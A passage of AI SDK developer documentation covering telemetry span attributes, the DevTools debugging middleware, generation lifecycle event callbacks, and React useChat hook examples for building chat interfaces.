- operation.name: ai.generateText and the functionId that was set through telemetry.functionId
- ai.operationId: "ai.generateText"
- ai.prompt: the prompt that was used when calling generateText
- ai.response.text: the text that was generated
- ai.response.toolCalls: the tool calls that were made as part of the generation (stringified JSON)
- ai.response.finishReason: the reason why the generation finished
- ai.settings.maxOutputTokens: the maximum number of output tokens that were set
ai.generateText.doGenerate (span): a provider doGenerate call. It can contain ai.toolCall spans. It contains the call LLM span information and the following attributes:
- operation.name: ai.generateText.doGenerate and the functionId that was set through telemetry.functionId
- ai.operationId: "ai.generateText.doGenerate"
- ai.prompt.messages: the messages that were passed into the provider
- ai.prompt.tools: array of stringified tool definitions. The tools can be of type function or provider-defined-client. Function tools have a name, description (optional), and inputSchema (JSON schema). Provider-defined-client tools have a name, id, and input (Record).
- ai.prompt.toolChoice: the stringified tool choice setting (JSON). It has a type property (auto, none, required, tool), and if the type is tool, a toolName property with the specific tool.
- ai.response.text: the text that was generated
- ai.response.toolCalls: the tool calls that were made as part of the generation (stringified JSON)
- ai.response.finishReason: the reason why the generation finished
ai.toolCall (span): a tool call that is made as part of the generateText call. See Tool call spans for more details.

streamText function

streamText records 3 types of spans and 2 types of events:

ai.streamText (span): the full length of the streamText call. It contains a ai.streamText.doStream span. It contains the basic LLM span information and the following attributes:
- operation.name: ai.streamText and the functionId that was set through telemetry.functionId
- ai.operationId: "ai.streamText"
- ai.prompt: the prompt that was used when calling streamText
- ai.response.text: the text that was generated
- ai.response.toolCalls: the tool calls that were made as part of the generation (stringified JSON)
- ai.response.finishReason: the reason why the generation finished
- ai.settings.maxOutputTokens: the maximum number of output tokens that were set
ai.streamText.doStream (span): a provider doStream call. This span contains an ai.stream.firstChunk event and ai.toolCall spans. It contains the call LLM span information and the following attributes:
- operation.name: ai.streamText.doStream and the functionId that was set through telemetry.functionId
- ai.operationId: "ai.streamText.doStream"
- ai.prompt.messages: the messages that were passed into the provider
- ai.prompt.tools: array of stringified tool definitions. The tools can be of type function or provider-defined-client. Function tools have a name, description (optional), and inputSchema (JSON schema). Provider-defined-client tools have a name, id, and input (Record).
- ai.prompt.toolChoice: the stringified tool choice setting (JSON). It has a type property (auto, none, required, tool), and if the type is tool, a toolName property with the specific tool.
- ai.response.text: the text that was generated
- ai.response.toolCalls: the tool calls that were made as part of the generation (stringified JSON)
- ai.response.msToFirstChunk: the time it took to receive the first chunk in milliseconds
- ai.response.msToFinish: the time it took to receive the finish part of the LLM stream in milliseconds
- ai.response.avgCompletionTokensPerSecond: the average number of completion tokens per second
- ai.response.finishReason: the reason why the generation finished
ai.toolCall (span): a tool call that is made as part of the generateText call. See Tool call spans for more details.
ai.stream.firstChunk (event): an event that is emitted when the first chunk of the stream is received.
- ai.response.msToFirstChunk: the time it took to receive the first chunk
ai.stream.finish (event): an event that is emitted when the finish part of the LLM stream is received.

It also records a ai.stream.firstChunk event when the first chunk of the stream is received.

Deprecated object APIs

If you still run deprecated object APIs, you will see legacy span names:

generateObject: ai.generateObject, ai.generateObject.doGenerate
streamObject: ai.streamObject, ai.streamObject.doStream, ai.stream.firstChunk

Legacy object spans include the same core metadata as other LLM spans, plus object-specific attributes such as ai.schema.*, ai.response.object, and ai.settings.output.

embed function

embed records 2 types of spans:

ai.embed (span): the full length of the embed call. It contains 1 ai.embed.doEmbed spans. It contains the basic embedding span information and the following attributes:
- operation.name: ai.embed and the functionId that was set through telemetry.functionId
- ai.operationId: "ai.embed"
- ai.value: the value that was passed into the embed function
- ai.embedding: a JSON-stringified embedding
ai.embed.doEmbed (span): a provider doEmbed call. It contains the basic embedding span information and the following attributes:
- operation.name: ai.embed.doEmbed and the functionId that was set through telemetry.functionId
- ai.operationId: "ai.embed.doEmbed"
- ai.values: the values that were passed into the provider (array)
- ai.embeddings: an array of JSON-stringified embeddings

embedMany function

embedMany records 2 types of spans:

ai.embedMany (span): the full length of the embedMany call. It contains 1 or more ai.embedMany.doEmbed spans. It contains the basic embedding span information and the following attributes:
- operation.name: ai.embedMany and the functionId that was set through telemetry.functionId
- ai.operationId: "ai.embedMany"
- ai.values: the values that were passed into the embedMany function
- ai.embeddings: an array of JSON-stringified embedding
ai.embedMany.doEmbed (span): a provider doEmbed call. It contains the basic embedding span information and the following attributes:
- operation.name: ai.embedMany.doEmbed and the functionId that was set through telemetry.functionId
- ai.operationId: "ai.embedMany.doEmbed"
- ai.values: the values that were sent to the provider
- ai.embeddings: an array of JSON-stringified embeddings for each value

Span Details

Basic LLM span information

Many spans that use LLMs (ai.generateText, ai.generateText.doGenerate, ai.streamText, ai.streamText.doStream) contain the following attributes:

resource.name: the functionId that was set through telemetry.functionId
ai.model.id: the id of the model
ai.model.provider: the provider of the model
ai.request.headers.*: the request headers that were passed in through headers
ai.response.providerMetadata: provider specific metadata returned with the generation response
ai.settings.maxRetries: the maximum number of retries that were set
ai.telemetry.functionId: the functionId that was set through telemetry.functionId
ai.telemetry.metadata.*: the metadata that was passed in through telemetry.metadata
ai.usage.completionTokens: the number of completion tokens that were used
ai.usage.promptTokens: the number of prompt tokens that were used

Call LLM span information

Spans that correspond to individual LLM calls (ai.generateText.doGenerate, ai.streamText.doStream) contain basic LLM span information and the following attributes:

ai.response.model: the model that was used to generate the response. This can be different from the model that was requested if the provider supports aliases.
ai.response.id: the id of the response. Uses the ID from the provider when available.
ai.response.timestamp: the timestamp of the response. Uses the timestamp from the provider when available.
Semantic Conventions for GenAI operations
- gen_ai.system: the provider that was used
- gen_ai.request.model: the model that was requested
- gen_ai.request.temperature: the temperature that was set
- gen_ai.request.max_tokens: the maximum number of tokens that were set
- gen_ai.request.frequency_penalty: the frequency penalty that was set
- gen_ai.request.presence_penalty: the presence penalty that was set
- gen_ai.request.top_k: the topK parameter value that was set
- gen_ai.request.top_p: the topP parameter value that was set
- gen_ai.request.stop_sequences: the stop sequences
- gen_ai.response.finish_reasons: the finish reasons that were returned by the provider
- gen_ai.response.model: the model that was used to generate the response. This can be different from the model that was requested if the provider supports aliases.
- gen_ai.response.id: the id of the response. Uses the ID from the provider when available.
- gen_ai.usage.input_tokens: the number of prompt tokens that were used
- gen_ai.usage.output_tokens: the number of completion tokens that were used

Basic embedding span information

Many spans that use embedding models (ai.embed, ai.embed.doEmbed, ai.embedMany, ai.embedMany.doEmbed) contain the following attributes:

ai.model.id: the id of the model
ai.model.provider: the provider of the model
ai.request.headers.*: the request headers that were passed in through headers
ai.settings.maxRetries: the maximum number of retries that were set
ai.telemetry.functionId: the functionId that was set through telemetry.functionId
ai.telemetry.metadata.*: the metadata that was passed in through telemetry.metadata
ai.usage.tokens: the number of tokens that were used
resource.name: the functionId that was set through telemetry.functionId

Tool call spans

Tool call spans (ai.toolCall) contain the following attributes:

operation.name: "ai.toolCall"
ai.operationId: "ai.toolCall"
ai.toolCall.name: the name of the tool
ai.toolCall.id: the id of the tool call
ai.toolCall.args: the input parameters of the tool call
ai.toolCall.result: the output result of the tool call. Only available if the tool call is successful and the result is serializable.

title: DevTools description: Debug and inspect AI SDK applications with DevTools

DevTools

AI SDK DevTools gives you full visibility over your AI SDK calls with generateText, streamText, and ToolLoopAgent. It helps you debug and inspect LLM requests, responses, tool calls, and multi-step interactions through a web-based UI.

DevTools is composed of two parts:

Middleware: Captures runs and steps from your AI SDK calls
Viewer: A web UI to inspect the captured data

Installation

Install the DevTools package:

pnpm add @ai-sdk/devtools

Requirements

AI SDK v6 beta (ai@^6.0.0-beta.0)
Node.js compatible runtime

Using DevTools

Add the middleware

Wrap your language model with the DevTools middleware using wrapLanguageModel:

import { wrapLanguageModel, gateway } from 'ai';
import { devToolsMiddleware } from '@ai-sdk/devtools';

const model = wrapLanguageModel({
  model: gateway('anthropic/claude-sonnet-4.5'),
  middleware: devToolsMiddleware(),
});

The wrapped model can be used with any AI SDK Core function:

import { generateText } from 'ai';

const result = await generateText({
  model, // wrapped model with DevTools
  prompt: 'What cities are in the United States?',
});

Launch the viewer

Start the DevTools viewer:

npx @ai-sdk/devtools

Open http://localhost:4983 to view your AI SDK interactions.

Monorepo usage

If you are using a monorepo setup (e.g. Turborepo, Nx), start DevTools from the same workspace where your AI SDK code runs.

For example, if your API is in apps/api, run:

cd apps/api
npx @ai-sdk/devtools

Captured data

The DevTools middleware captures the following information from your AI SDK calls:

Input parameters and prompts: View the complete input sent to your LLM
Output content and tool calls: Inspect generated text and tool invocations
Token usage and timing: Monitor resource consumption and performance
Raw provider data: Access complete request and response payloads

Runs and steps

DevTools organizes captured data into runs and steps:

Run: A complete multi-step AI interaction, grouped by the initial prompt
Step: A single LLM call within a run (e.g., one generateText or streamText call)

Multi-step interactions, such as those created by tool calling or agent loops, are grouped together as a single run with multiple steps.

How it works

The DevTools middleware intercepts all generateText and streamText calls through the language model middleware system. Captured data is stored locally in a JSON file (.devtools/generations.json) and served through a web UI built with Hono and React.

Security considerations

DevTools stores all AI interactions locally in plain text files, including:

User prompts and messages
LLM responses
Tool call arguments and results
API request and response data

Only use DevTools in local development environments. Do not enable DevTools in production or when handling sensitive data.

title: Event Callbacks description: Subscribe to lifecycle events in generateText and streamText calls

Event Callbacks

The AI SDK provides per-call event callbacks that you can pass to generateText and streamText to observe lifecycle events. This is useful for building observability tools, logging systems, analytics, and debugging utilities.

Basic Usage

Pass callbacks directly to generateText or streamText:

import { generateText } from 'ai';

const result = await generateText({
  model: openai('gpt-4o'),
  prompt: 'What is the weather in San Francisco?',
  experimental_onStart: event => {
    console.log('Generation started:', event.model.modelId);
  },
  onFinish: event => {
    console.log('Generation finished:', event.totalUsage);
  },
});

Available Callbacks

<PropertiesTable content={[ { name: 'experimental_onStart', type: '(event: OnStartEvent) => void | Promise', description: 'Called when generation begins, before any LLM calls.', }, { name: 'experimental_onStepStart', type: '(event: OnStepStartEvent) => void | Promise', description: 'Called when a step (LLM call) begins, before the provider is called.', }, { name: 'experimental_onToolCallStart', type: '(event: OnToolCallStartEvent) => void | Promise', description: "Called when a tool's execute function is about to run.", }, { name: 'experimental_onToolCallFinish', type: '(event: OnToolCallFinishEvent) => void | Promise', description: "Called when a tool's execute function completes or errors.", }, { name: 'onStepFinish', type: '(event: OnStepFinishEvent) => void | Promise', description: 'Called when a step (LLM call) completes.', }, { name: 'onFinish', type: '(event: OnFinishEvent) => void | Promise', description: 'Called when the entire generation completes (all steps finished).', }, ]} />

Event Reference

`experimental_onStart`

Called when the generation operation begins, before any LLM calls are made.

const result = await generateText({
  model: openai('gpt-4o'),
  prompt: 'Hello!',
  experimental_onStart: event => {
    console.log('Model:', event.model.modelId);
    console.log('Temperature:', event.temperature);
  },
});

<PropertiesTable content={[ { name: 'model', type: '{ provider: string; modelId: string }', description: 'The model being used for generation.', }, { name: 'system', type: 'string | SystemModelMessage | Array | undefined', description: 'The system message(s) provided to the model.', }, { name: 'prompt', type: 'string | Array | undefined', description: 'The prompt string or array of messages if using the prompt option.', }, { name: 'messages', type: 'Array | undefined', description: 'The messages array if using the messages option.', }, { name: 'tools', type: 'ToolSet | undefined', description: 'The tools available for this generation.', }, { name: 'toolChoice', type: 'ToolChoice | undefined', description: 'The tool choice strategy for this generation.', }, { name: 'activeTools', type: 'Array | undefined', description: 'Limits which tools are available for the model to call.', }, { name: 'maxOutputTokens', type: 'number | undefined', description: 'Maximum number of tokens to generate.', }, { name: 'temperature', type: 'number | undefined', description: 'Sampling temperature for generation.', }, { name: 'topP', type: 'number | undefined', description: 'Top-p (nucleus) sampling parameter.', }, { name: 'topK', type: 'number | undefined', description: 'Top-k sampling parameter.', }, { name: 'presencePenalty', type: 'number | undefined', description: 'Presence penalty for generation.', }, { name: 'frequencyPenalty', type: 'number | undefined', description: 'Frequency penalty for generation.', }, { name: 'stopSequences', type: 'string[] | undefined', description: 'Sequences that will stop generation.', }, { name: 'seed', type: 'number | undefined', description: 'Random seed for reproducible generation.', }, { name: 'maxRetries', type: 'number', description: 'Maximum number of retries for failed requests.', }, { name: 'timeout', type: 'TimeoutConfiguration | undefined', description: 'Timeout configuration for the generation.', }, { name: 'headers', type: 'Record<string, string | undefined> | undefined', description: 'Additional HTTP headers sent with the request.', }, { name: 'providerOptions', type: 'ProviderOptions | undefined', description: 'Additional provider-specific options.', }, { name: 'stopWhen', type: 'StopCondition | Array | undefined', description: 'Condition(s) for stopping the generation.', }, { name: 'output', type: 'Output | undefined', description: 'The output specification for structured outputs.', }, { name: 'abortSignal', type: 'AbortSignal | undefined', description: 'Abort signal for cancelling the operation.', }, { name: 'include', type: '{ requestBody?: boolean; responseBody?: boolean } | undefined', description: 'Settings for controlling what data is included in step results.', }, { name: 'functionId', type: 'string | undefined', description: 'Identifier from telemetry settings for grouping related operations.', }, { name: 'metadata', type: 'Record<string, unknown> | undefined', description: 'Additional metadata passed to the generation.', }, { name: 'experimental_context', type: 'unknown', description: 'User-defined context object that flows through the entire generation lifecycle.', }, ]} />

`experimental_onStepStart`

Called before each step (LLM call) begins. Useful for tracking multi-step generations.

const result = await generateText({
  model: openai('gpt-4o'),
  prompt: 'Hello!',
  experimental_onStepStart: event => {
    console.log('Step:', event.stepNumber);
    console.log('Messages:', event.messages.length);
  },
});

<PropertiesTable content={[ { name: 'stepNumber', type: 'number', description: 'Zero-based index of the current step.', }, { name: 'model', type: '{ provider: string; modelId: string }', description: 'The model being used for this step.', }, { name: 'system', type: 'string | SystemModelMessage | Array | undefined', description: 'The system message for this step.', }, { name: 'messages', type: 'Array', description: 'The messages that will be sent to the model for this step.', }, { name: 'tools', type: 'ToolSet | undefined', description: 'The tools available for this generation.', }, { name: 'toolChoice', type: 'LanguageModelV3ToolChoice | undefined', description: 'The tool choice configuration for this step.', }, { name: 'activeTools', type: 'Array | undefined', description: 'Limits which tools are available for this step.', }, { name: 'steps', type: 'ReadonlyArray', description: 'Array of results from previous steps (empty for first step).', }, { name: 'providerOptions', type: 'ProviderOptions | undefined', description: 'Additional provider-specific options for this step.', }, { name: 'timeout', type: 'TimeoutConfiguration | undefined', description: 'Timeout configuration for the generation.', }, { name: 'headers', type: 'Record<string, string | undefined> | undefined', description: 'Additional HTTP headers sent with the request.', }, { name: 'stopWhen', type: 'StopCondition | Array | undefined', description: 'Condition(s) for stopping the generation.', }, { name: 'output', type: 'Output | undefined', description: 'The output specification for structured outputs.', }, { name: 'abortSignal', type: 'AbortSignal | undefined', description: 'Abort signal for cancelling the operation.', }, { name: 'include', type: '{ requestBody?: boolean; responseBody?: boolean } | undefined', description: 'Settings for controlling what data is included in step results.', }, { name: 'functionId', type: 'string | undefined', description: 'Identifier from telemetry settings for grouping related operations.', }, { name: 'metadata', type: 'Record<string, unknown> | undefined', description: 'Additional metadata from telemetry settings.', }, { name: 'experimental_context', type: 'unknown', description: 'User-defined context object. May be updated from prepareStep between steps.', }, ]} />

`experimental_onToolCallStart`

Called before a tool's execute function runs.

const result = await generateText({
  model: openai('gpt-4o'),
  prompt: 'What is the weather?',
  tools: { getWeather },
  experimental_onToolCallStart: event => {
    console.log('Tool:', event.toolCall.toolName);
    console.log('Input:', event.toolCall.input);
  },
});

<PropertiesTable content={[ { name: 'stepNumber', type: 'number | undefined', description: 'Zero-based index of the current step where this tool call occurs.', }, { name: 'model', type: '{ provider: string; modelId: string } | undefined', description: 'The model being used for this step.', }, { name: 'toolCall', type: 'TypedToolCall', description: 'The full tool call object.', properties: [ { type: 'TypedToolCall', parameters: [ { name: 'type', type: "'tool-call'", description: 'The type of the call.', }, { name: 'toolCallId', type: 'string', description: 'Unique identifier for this tool call.', }, { name: 'toolName', type: 'string', description: 'Name of the tool being called.', }, { name: 'input', type: 'unknown', description: 'Input arguments passed to the tool.', }, ], }, ], }, { name: 'messages', type: 'Array', description: 'The conversation messages available at tool execution time.', }, { name: 'abortSignal', type: 'AbortSignal | undefined', description: 'Signal for cancelling the operation.', }, { name: 'functionId', type: 'string | undefined', description: 'Identifier from telemetry settings for grouping related operations.', }, { name: 'metadata', type: 'Record<string, unknown> | undefined', description: 'Additional metadata from telemetry settings.', }, { name: 'experimental_context', type: 'unknown', description: 'User-defined context object flowing through the generation.', }, ]} />

`experimental_onToolCallFinish`

Called after a tool's execute function completes or errors. Uses a discriminated union on the success field.

const result = await generateText({
  model: openai('gpt-4o'),
  prompt: 'What is the weather?',
  tools: { getWeather },
  experimental_onToolCallFinish: event => {
    console.log('Tool:', event.toolCall.toolName);
    console.log('Duration:', event.durationMs, 'ms');

    if (event.success) {
      console.log('Output:', event.output);
    } else {
      console.error('Error:', event.error);
    }
  },
});

<PropertiesTable content={[ { name: 'stepNumber', type: 'number | undefined', description: 'Zero-based index of the current step where this tool call occurred.', }, { name: 'model', type: '{ provider: string; modelId: string } | undefined', description: 'The model being used for this step.', }, { name: 'toolCall', type: 'TypedToolCall', description: 'The full tool call object.', properties: [ { type: 'TypedToolCall', parameters: [ { name: 'type', type: "'tool-call'", description: 'The type of the call.', }, { name: 'toolCallId', type: 'string', description: 'Unique identifier for this tool call.', }, { name: 'toolName', type: 'string', description: 'Name of the tool that was called.', }, { name: 'input', type: 'unknown', description: 'Input arguments passed to the tool.', }, ], }, ], }, { name: 'messages', type: 'Array', description: 'The conversation messages available at tool execution time.', }, { name: 'abortSignal', type: 'AbortSignal | undefined', description: 'Signal for cancelling the operation.', }, { name: 'durationMs', type: 'number', description: 'Execution time of the tool call in milliseconds.', }, { name: 'functionId', type: 'string | undefined', description: 'Identifier from telemetry settings for grouping related operations.', }, { name: 'metadata', type: 'Record<string, unknown> | undefined', description: 'Additional metadata from telemetry settings.', }, { name: 'experimental_context', type: 'unknown', description: 'User-defined context object flowing through the generation.', }, { name: 'success', type: 'boolean', description: 'Discriminator indicating whether the tool call succeeded. When true, output is available. When false, error is available.', }, { name: 'output', type: 'unknown', description: "The tool's return value (only present when success is true).", }, { name: 'error', type: 'unknown', description: 'The error that occurred during tool execution (only present when success is false).', }, ]} />

`onStepFinish`

Called after each step (LLM call) completes. Provides the full StepResult.

const result = await generateText({
  model: openai('gpt-4o'),
  prompt: 'Hello!',
  onStepFinish: event => {
    console.log('Step:', event.stepNumber);
    console.log('Finish reason:', event.finishReason);
    console.log('Tokens:', event.usage.totalTokens);
  },
});

<PropertiesTable content={[ { name: 'stepNumber', type: 'number', description: 'Zero-based index of this step.', }, { name: 'model', type: '{ provider: string; modelId: string }', description: 'Information about the model that produced this step.', }, { name: 'finishReason', type: "'stop' | 'length' | 'content-filter' | 'tool-calls' | 'error' | 'other'", description: 'The unified reason why the generation finished.', }, { name: 'usage', type: 'LanguageModelUsage', description: 'The token usage of the generated text.', properties: [ { type: 'LanguageModelUsage', parameters: [ { name: 'inputTokens', type: 'number | undefined', description: 'The total number of input (prompt) tokens used.', }, { name: 'outputTokens', type: 'number | undefined', description: 'The number of output (completion) tokens used.', }, { name: 'totalTokens', type: 'number | undefined', description: 'The total number of tokens used.', }, ], }, ], }, { name: 'text', type: 'string', description: 'The generated text.', }, { name: 'toolCalls', type: 'Array', description: 'The tool calls that were made during the generation.', }, { name: 'toolResults', type: 'Array', description: 'The results of the tool calls.', }, { name: 'content', type: 'Array', description: 'The content that was generated in this step.', }, { name: 'reasoning', type: 'Array', description: 'The reasoning that was generated during the generation.', }, { name: 'reasoningText', type: 'string | undefined', description: 'The reasoning text that was generated.', }, { name: 'files', type: 'Array', description: 'The files that were generated during the generation.', }, { name: 'sources', type: 'Array', description: 'The sources that were used to generate the text.', }, { name: 'warnings', type: 'CallWarning[] | undefined', description: 'Warnings from the model provider.', }, { name: 'request', type: 'LanguageModelRequestMetadata', description: 'Additional request information.', }, { name: 'response', type: 'LanguageModelResponseMetadata', description: 'Additional response information including id, modelId, timestamp, headers, and messages.', }, { name: 'functionId', type: 'string | undefined', description: 'Identifier from telemetry settings for grouping related operations.', }, { name: 'metadata', type: 'Record<string, unknown> | undefined', description: 'Additional metadata from telemetry settings.', }, { name: 'experimental_context', type: 'unknown', description: 'User-defined context object flowing through the generation.', }, { name: 'providerMetadata', type: 'ProviderMetadata | undefined', description: 'Additional provider-specific metadata.', }, ]} />

`onFinish`

Called when the entire generation completes (all steps finished). Includes aggregated data.

const result = await generateText({
  model: openai('gpt-4o'),
  prompt: 'Hello!',
  onFinish: event => {
    console.log('Total steps:', event.steps.length);
    console.log('Total tokens:', event.totalUsage.totalTokens);
    console.log('Final text:', event.text);
  },
});

<PropertiesTable content={[ { name: 'steps', type: 'Array', description: 'Array containing results from all steps in the generation.', }, { name: 'totalUsage', type: 'LanguageModelUsage', description: 'Aggregated token usage across all steps.', properties: [ { type: 'LanguageModelUsage', parameters: [ { name: 'inputTokens', type: 'number | undefined', description: 'The total number of input tokens used across all steps.', }, { name: 'outputTokens', type: 'number | undefined', description: 'The total number of output tokens used across all steps.', }, { name: 'totalTokens', type: 'number | undefined', description: 'The total number of tokens used across all steps.', }, ], }, ], }, { name: 'stepNumber', type: 'number', description: 'Zero-based index of the final step.', }, { name: 'model', type: '{ provider: string; modelId: string }', description: 'Information about the model that produced the final step.', }, { name: 'finishReason', type: "'stop' | 'length' | 'content-filter' | 'tool-calls' | 'error' | 'other'", description: 'The unified reason why the generation finished.', }, { name: 'usage', type: 'LanguageModelUsage', description: 'The token usage from the final step only (not aggregated).', }, { name: 'text', type: 'string', description: 'The full text that has been generated.', }, { name: 'toolCalls', type: 'Array', description: 'The tool calls that were made in the final step.', }, { name: 'toolResults', type: 'Array', description: 'The results of the tool calls from the final step.', }, { name: 'content', type: 'Array', description: 'The content that was generated in the final step.', }, { name: 'reasoning', type: 'Array', description: 'The reasoning that was generated.', }, { name: 'reasoningText', type: 'string | undefined', description: 'The reasoning text that was generated.', }, { name: 'files', type: 'Array', description: 'Files that were generated in the final step.', }, { name: 'sources', type: 'Array', description: 'Sources that have been used as input to generate the response.', }, { name: 'warnings', type: 'CallWarning[] | undefined', description: 'Warnings from the model provider.', }, { name: 'request', type: 'LanguageModelRequestMetadata', description: 'Additional request information from the final step.', }, { name: 'response', type: 'LanguageModelResponseMetadata', description: 'Additional response information from the final step.', }, { name: 'functionId', type: 'string | undefined', description: 'Identifier from telemetry settings for grouping related operations.', }, { name: 'metadata', type: 'Record<string, unknown> | undefined', description: 'Additional metadata from telemetry settings.', }, { name: 'experimental_context', type: 'unknown', description: 'The final state of the user-defined context object.', }, { name: 'providerMetadata', type: 'ProviderMetadata | undefined', description: 'Additional provider-specific metadata from the final step.', }, ]} />

Use Cases

Logging and Debugging

import { generateText } from 'ai';

const result = await generateText({
  model: openai('gpt-4o'),
  prompt: 'Hello!',
  experimental_onStart: event => {
    console.log(`[${new Date().toISOString()}] Generation started`, {
      model: event.model.modelId,
      provider: event.model.provider,
    });
  },
  onStepFinish: event => {
    console.log(
      `[${new Date().toISOString()}] Step ${event.stepNumber} finished`,
      {
        finishReason: event.finishReason,
        tokens: event.usage.totalTokens,
      },
    );
  },
  onFinish: event => {
    console.log(`[${new Date().toISOString()}] Generation complete`, {
      totalSteps: event.steps.length,
      totalTokens: event.totalUsage.totalTokens,
    });
  },
});

Tool Execution Monitoring

import { generateText } from 'ai';

const result = await generateText({
  model: openai('gpt-4o'),
  prompt: 'What is the weather?',
  tools: { getWeather },
  experimental_onToolCallStart: event => {
    console.log(`Tool "${event.toolCall.toolName}" starting...`);
  },
  experimental_onToolCallFinish: event => {
    if (event.success) {
      console.log(
        `Tool "${event.toolCall.toolName}" completed in ${event.durationMs}ms`,
      );
    } else {
      console.error(`Tool "${event.toolCall.toolName}" failed:`, event.error);
    }
  },
});

Error Handling

Errors thrown inside callbacks are caught and do not break the generation flow. This ensures that monitoring code cannot disrupt your application:

const result = await generateText({
  model: openai('gpt-4o'),
  prompt: 'Hello!',
  experimental_onStart: () => {
    throw new Error('This error is caught internally');
    // Generation continues normally
  },
});

title: Overview description: An overview of AI SDK UI.

AI SDK UI

AI SDK UI provides robust abstractions that simplify the complex tasks of managing chat streams and UI updates on the frontend, enabling you to develop dynamic AI-driven interfaces more efficiently. With three main hooks — useChat, useCompletion, and useObject — you can incorporate real-time chat capabilities, text completions, streamed JSON, and interactive assistant features into your app.

useChat offers real-time streaming of chat messages, abstracting state management for inputs, messages, loading, and errors, allowing for seamless integration into any UI design.
useCompletion enables you to handle text completions in your applications, managing the prompt input and automatically updating the UI as new completions are streamed.
useObject is a hook that allows you to consume streamed JSON objects, providing a simple way to handle and display structured data in your application.

These hooks are designed to reduce the complexity and time required to implement AI interactions, letting you focus on creating exceptional user experiences.

UI Framework Support

AI SDK UI supports the following frameworks: React, Svelte, Vue.js, Angular, and SolidJS.

Here is a comparison of the supported functions across these frameworks:

	useChat	useCompletion	useObject
React `@ai-sdk/react`
Vue.js `@ai-sdk/vue`
Svelte `@ai-sdk/svelte`	Chat	Completion	StructuredObject
Angular `@ai-sdk/angular`	Chat	Completion	StructuredObject
SolidJS (community)

Framework Examples

Explore these example implementations for different frameworks:

API Reference

Please check out the AI SDK UI API Reference for more details on each function.

title: Chatbot description: Learn how to use the useChat hook.

Chatbot

To summarize, the useChat hook provides the following features:

Message Streaming: All the messages from the AI provider are streamed to the chat UI in real-time.
Managed States: The hook manages the states for input, messages, status, error and more for you.
Seamless Integration: Easily integrate your chat AI into any design or layout with minimal effort.

Example

'use client';

import { useChat } from '@ai-sdk/react';
import { DefaultChatTransport } from 'ai';
import { useState } from 'react';

export default function Page() {
  const { messages, sendMessage, status } = useChat({
    transport: new DefaultChatTransport({
      api: '/api/chat',
    }),
  });
  const [input, setInput] = useState('');

  return (
    <>
      {messages.map(message => (
        <div key={message.id}>
          {message.role === 'user' ? 'User: ' : 'AI: '}
          {message.parts.map((part, index) =>
            part.type === 'text' ? <span key={index}>{part.text}</span> : null,
          )}
        </div>
      ))}

      <form
        onSubmit={e => {
          e.preventDefault();
          if (input.trim()) {
            sendMessage({ text: input });
            setInput('');
          }
        }}
      >
        <input
          value={input}
          onChange={e => setInput(e.target.value)}
          disabled={status !== 'ready'}
          placeholder="Say something..."
        />
        <button type="submit" disabled={status !== 'ready'}>
          Submit
        </button>
      </form>
    </>
  );
}

import { convertToModelMessages, streamText, UIMessage } from 'ai';
__PROVIDER_IMPORT__;

// Allow streaming responses up to 30 seconds
export const maxDuration = 30;

export async function POST(req: Request) {
  const { messages }: { messages: UIMessage[] } = await req.json();

  const result = streamText({
    model: __MODEL__,
    system: 'You are a helpful assistant.',
    messages: await convertToModelMessages(messages),
  });

  return result.toUIMessageStreamResponse();
}

This enables a seamless chat experience where the user can see the AI response as soon as it is available, without having to wait for the entire response to be received.

Customized UI

useChat also provides ways to manage the chat message states via code, show status, and update messages without being triggered by user interactions.

Status

The useChat hook returns a status. It has the following possible values:

submitted: The message has been sent to the API and we're awaiting the start of the response stream.
streaming: The response is actively streaming in from the API, receiving chunks of data.
ready: The full response has been received and processed; a new user message can be submitted.
error: An error occurred during the API request, preventing successful completion.

You can use status for e.g. the following purposes:

To show a loading spinner while the chatbot is processing the user's message.
To show a "Stop" button to abort the current message.
To disable the submit button.

'use client';

import { useChat } from '@ai-sdk/react';
import { DefaultChatTransport } from 'ai';
import { useState } from 'react';

export default function Page() {
  const { messages, sendMessage, status, stop } = useChat({
    transport: new DefaultChatTransport({
      api: '/api/chat',
    }),
  });
  const [input, setInput] = useState('');

  return (
    <>
      {messages.map(message => (
        <div key={message.id}>
          {message.role === 'user' ? 'User: ' : 'AI: '}
          {message.parts.map((part, index) =>
            part.type === 'text' ? <span key={index}>{part.text}</span> : null,
          )}
        </div>
      ))}

      {(status === 'submitted' || status === 'streaming') && (
        <div>
          {status === 'submitted' && <Spinner />}
          <button type="button" onClick={() => stop()}>
            Stop
          </button>
        </div>
      )}

      <form
        onSubmit={e => {
          e.preventDefault();
          if (input.trim()) {
            sendMessage({ text: input });
            setInput('');
          }
        }}
      >
        <input
          value={input}
          onChange={e => setInput(e.target.value)}
          disabled={status !== 'ready'}
          placeholder="Say something..."
        />
        <button type="submit" disabled={status !== 'ready'}>
          Submit
        </button>
      </form>
    </>
  );
}

Error State

Similarly, the error state reflects the error object thrown during the fetch request. It can be used to display an error message, disable the submit button, or show a retry button:

'use client';

import { useChat } from '@ai-sdk/react';
import { DefaultChatTransport } from 'ai';
import { useState } from 'react';

export default function Chat() {
  const { messages, sendMessage, error, regenerate } = useChat({
    transport: new DefaultChatTransport({
      api: '/api/chat',
    }),
  });
  const [input, setInput] = useState('');

  return (
    <div>
      {messages.map(m => (
        <div key={m.id}>
          {m.role}:{' '}
          {m.parts.map((part, index) =>
            part.type === 'text' ? <span key={index}>{part.text}</span> : null,
          )}
        </div>
      ))}

      {error && (
        <>
          <div>An error occurred.</div>
          <button type="button" onClick={() => regenerate()}>
            Retry
          </button>
        </>
      )}

      <form
        onSubmit={e => {
          e.preventDefault();
          if (input.trim()) {
            sendMessage({ text: input });
            setInput('');
          }
        }}
      >
        <input
          value={input}
          onChange={e => setInput(e.target.value)}
          disabled={error != null}
        />
      </form>
    </div>
  );
}

Please also see the error handling guide for more information.

Modify messages

Sometimes, you may want to directly modify some existing messages. For example, a delete button can be added to each message to allow users to remove them from the chat history.

The setMessages function can help you achieve these tasks:

const { messages, setMessages } = useChat()

const handleDelete = (id) => {
  setMessages(messages.filter(message => message.id !== id))
}

return <>
  {messages.map(message => (
    <div key={message.id}>
      {message.role === 'user' ? 'User: ' : 'AI: '}
      {message.parts.map((part, index) => (
        part.type === 'text' ? (
          <span key={index}>{part.text}</span>
        ) : null
      ))}
      <button onClick={() => handleDelete(message.id)}>Delete</button>
    </div>
  ))}
  ...

You can think of messages and setMessages as a pair of state and setState in React.

Cancellation and regeneration

It's also a common use case to abort the response message while it's still streaming back from the AI provider. You can do this by calling the stop function returned by the useChat hook.

const { stop, status } = useChat()

return <>
  <button onClick={stop} disabled={!(status === 'streaming' || status === 'submitted')}>Stop</button>
  ...

